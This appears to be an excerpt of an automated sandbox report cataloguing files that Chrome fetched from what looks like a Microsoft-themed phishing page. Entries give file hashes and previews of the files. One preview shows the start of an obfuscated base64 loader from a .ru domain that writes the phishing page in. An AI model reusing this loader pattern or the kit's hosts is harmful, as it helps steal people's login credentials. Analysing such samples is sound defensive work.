                                                                                                        Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):673
                                                                                                        Entropy (8bit):7.6596900876595075
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2672
                                                                                                        Entropy (8bit):6.640973516071413
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                        Malicious:false
                                                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1982
                                                                                                        Entropy (8bit):7.876985493486056
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:Orv56pM7qdU5PLB7zotUDCeJXhReoKlrqdY7Ays54Kdbf1V:Orv5yJEN/kUDpph4oKL3saGhV
                                                                                                        MD5:50A425B15FE6EBC18D0A7E54AA4E04A8
                                                                                                        SHA1:32AF3219078203AAFD49502A4942C0E4C1AD66D1
                                                                                                        SHA-256:D80C8AB46FBCE3205F6FC01B65989DFF99B344B578337C380B4E2FC376A84786
                                                                                                        SHA-512:95EB5F379D85FA4D5606D0BA8A583FC67F930FB322ADF84D699F1D34FBBA13A4A3D7988EFDDB7D0DEDEB69C53E1ADFF64DB9CAD944BE9CE303D7B63F3CC61651
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR... ... .....szz.....IDATX..ilT......7......./!... 0. ...*.L....UIZM.TXUJ...JM..Vm.4R.T)..@..l....L..R.k....@..3..g.w.a.c.f.T9...v.=.......cNW.S.{.u.....j~k]./`J.kZ...c..8&.B......:....2..=. g...__....n......t.".......=..bE..D...P..|Y..N^......!../.e...:]u.yo.L......'.U.....w....\sN....Ug...z.....).|.x.Q....k....*.....$...p.W..@0%.8]G....p8...;5..@...B.1..].. ...2.......e.n.........t...!e..k`p..CHy...>5..1.=.|...#.....|.07...\.......c...#)...:b...l|H.'Z9.KU....$re.2eAV%....t...SRB....$.c U..`..1Q.E..j.,d...f!.PS..R....:~4.f.."..ii...8.......Kl.O...<.#.L.PPP...*#Q.z.....z...p.........n1..F'O/..)H)ij.b._.i...`)..A...[...[......UE.N..A..;?.(O..H.&.[.5...Z3..8...(BP63.t.F..>.19V..>'3..."..S..N.Rp.._....J... g....+[W.....g;x.....-x..V.......q.4....tL~.dj....bg...3P.:.@..^...Y..H.x..M.F".....X.W.E..+.r.........|..2.i .....Hf@.9!....Je..E%9\i...C7.r...":..w..D.[dg.W............(.,..d....*....ju..E..zt.(/....,*..n3...V.x...jU.....Z.z..^:.'!.....V.3<W
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):20410
                                                                                                        Entropy (8bit):7.980582012022051
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                                        MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                        SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                        SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                        SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                        Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):2672
                                                                                                        Entropy (8bit):6.640973516071413
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13665
                                                                                                        Entropy (8bit):4.492668383410837
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:KBk+P8F+qCyuQRoINig6rjjUQvETLyx+YwCk/h66lbEggK6Kd9KAZjg:KXe+aW2QwD/hJbbm
                                                                                                        MD5:4771A363CA048FD050F7E4BBFAD9997B
                                                                                                        SHA1:33CCEA4DE0B606C55495356E8EF19C4EB03170FD
                                                                                                        SHA-256:B6F7D8953D08295BE7C41392B47B22C86F6CED404CA7AB0C674608F74D87E583
                                                                                                        SHA-512:E2E48AF45B75C44843E558B1C53F1C3173BF2E354924DFBECAD8C08804A367BEF60E355A30D7F7D00FA7B9B450F5A6177B65339716077167D941BDCC45D20CEB
                                                                                                        Malicious:false
                                                                                                        Preview:(function () {. 'use strict';.. var extend = function () {. var length = arguments.length;. var target = arguments[0] || {};. if (typeof target != "object" && typeof target != "function") {. target = {};. }. if (length == 1) {. target = this;. i--;. }. for (var i = 1; i < length; i++) {. var source = arguments[i];. for (var key in source) {. if (Object.prototype.hasOwnProperty.call(source, key)) {. target[key] = source[key];. }. }. }. return target;. }.. var isFunction = function isFunction(obj) {. return typeof obj === "function" && typeof obj.nodeType !== "number";. };.. var SliderCaptcha = function (element, options) {. this.$element = element;. this.options = extend({}, SliderCaptcha.DEFAULTS, options);. this.$element.style.position = 'relative';. this.$e
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5525
                                                                                                        Entropy (8bit):7.961202222662501
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                        MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                        SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                        SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                        SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                        Malicious:false
                                                                                                        Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):1982
                                                                                                        Entropy (8bit):7.876985493486056
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:Orv56pM7qdU5PLB7zotUDCeJXhReoKlrqdY7Ays54Kdbf1V:Orv5yJEN/kUDpph4oKL3saGhV
                                                                                                        MD5:50A425B15FE6EBC18D0A7E54AA4E04A8
                                                                                                        SHA1:32AF3219078203AAFD49502A4942C0E4C1AD66D1
                                                                                                        SHA-256:D80C8AB46FBCE3205F6FC01B65989DFF99B344B578337C380B4E2FC376A84786
                                                                                                        SHA-512:95EB5F379D85FA4D5606D0BA8A583FC67F930FB322ADF84D699F1D34FBBA13A4A3D7988EFDDB7D0DEDEB69C53E1ADFF64DB9CAD944BE9CE303D7B63F3CC61651
                                                                                                        Malicious:false
                                                                                                        URL:https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.png
                                                                                                        Preview:.PNG........IHDR... ... .....szz.....IDATX..ilT......7......./!... 0. ...*.L....UIZM.TXUJ...JM..Vm.4R.T)..@..l....L..R.k....@..3..g.w.a.c.f.T9...v.=.......cNW.S.{.u.....j~k]./`J.kZ...c..8&.B......:....2..=. g...__....n......t.".......=..bE..D...P..|Y..N^......!../.e...:]u.yo.L......'.U.....w....\sN....Ug...z.....).|.x.Q....k....*.....$...p.W..@0%.8]G....p8...;5..@...B.1..].. ...2.......e.n.........t...!e..k`p..CHy...>5..1.=.|...#.....|.07...\.......c...#)...:b...l|H.'Z9.KU....$re.2eAV%....t...SRB....$.c U..`..1Q.E..j.,d...f!.PS..R....:~4.f.."..ii...8.......Kl.O...<.#.L.PPP...*#Q.z.....z...p.........n1..F'O/..)H)ij.b._.i...`)..A...[...[......UE.N..A..;?.(O..H.&.[.5...Z3..8...(BP63.t.F..>.19V..>'3..."..S..N.Rp.._....J... g....+[W.....g;x.....-x..V.......q.4....tL~.dj....bg...3P.:.@..^...Y..H.x..M.F".....X.W.E..+.r.........|..2.i .....Hf@.9!....Je..E%9\i...C7.r...":..w..D.[dg.W............(.,..d....*....ju..E..zt.(/....,*..n3...V.x...jU.....Z.z..^:.'!.....V.3<W
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (7561), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):19954
                                                                                                        Entropy (8bit):5.87772842477684
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:4nuP3Z+6MSdU2h+DV/R6Mg6aTulnbnuP3Z+6MSdU2h+DV/R6Mg6aTulllr3lrs:bvUykdg6OsnkvUykdg6Osllr3lrs
                                                                                                        MD5:07FD4407475AC5DD5D23D9B4AAB33824
                                                                                                        SHA1:09B049C87B59FDA6E8E379FAE768C083B12F1BA6
                                                                                                        SHA-256:23625FDEC1A2FACE5ACAA175F9C4E92302C2DC85DA82B91C033BE5EA5CD32999
                                                                                                        SHA-512:3608DDC2A34259937BDBE464D83EA483F6532F1C8101A790BB1FE12A30B34B2DDCF2D924FB2C304CE99B1BDFEA605591D77A9ABEAEF382DF127CDC375BB772F9
                                                                                                        Malicious:false
                                                                                                        URL:https://nokixa.qemitorn.ru/yz8E/
                                                                                                        Preview:<script>....if(atob("aHR0cHM6Ly9RVnRpLnFlbWl0b3JuLnJ1L3l6OEUv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNadU95QVpMYkx4IGg0e21hcmdpbi10b
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (54926)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):55111
                                                                                                        Entropy (8bit):4.7118090605418175
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:guC31UP18Pq4/vnU63HJXkQCZ/WMQyjJKX719sGsQz5:gu5PWC4/vzH5BCkgc7zsiF
                                                                                                        MD5:E4C542A7F6BF6F74FDD8CDF6E8096396
                                                                                                        SHA1:3A0571A695A35F238026B9398386DC99D9A0C56D
                                                                                                        SHA-256:EEB17A45A48ACA1D7ADBCF04DE155DCD0B47CB36AD036310446BB471FEA9AAA3
                                                                                                        SHA-512:80C8D07836842C9D2BC8223E16D22DBAC53D3240227C265C1AAEFCF45AF3922338F43F256C38686946885F8012535F3BC287CC3658012787246EB5CCF6C13A3E
                                                                                                        Malicious:false
                                                                                                        URL:https://use.fontawesome.com/releases/v5.8.1/css/all.css
                                                                                                        Preview:/*!. * Font Awesome Free 5.8.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-lef
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):35170
                                                                                                        Entropy (8bit):7.993096534744333
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                        MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                        SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                        SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                        SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                        Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):16345
                                                                                                        Entropy (8bit):7.98960525258912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                                        MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                                        SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                                        SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                                        SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                                        Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                        Category:dropped
                                                                                                        Size (bytes):673
                                                                                                        Entropy (8bit):7.6596900876595075
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                        Malicious:false
                                                                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47520)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):47521
